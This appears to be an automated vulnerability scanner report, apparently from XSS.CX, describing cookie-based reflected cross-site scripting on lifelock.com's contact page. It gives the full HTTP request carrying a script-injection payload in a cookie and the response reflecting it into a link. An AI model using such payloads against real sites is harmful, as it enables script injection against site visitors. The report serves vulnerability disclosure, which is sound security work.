Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /contact/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; TSceba2f=b5c4a7967e88a22231130594707a6c4e3ec073d706939dfc4db39163; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.1.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH136dbe7"><script>alert(1)</script>653af69f8df; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; 480-CT=3114#4/24/2011/2/56/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:22:50 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=7955ad37fc02cb9d845204e66bdf49993ec073d706939dfc4db3978a; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 14510

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="https://secure.lifelock.com/enrollment?promocode=googsearch136dbe7"><script>alert(1)</script>653af69f8df" class="enroll-now">
...[SNIP]...

Report generated by XSS.CX at Tue Oct 18 08:29:52 CDT 2011.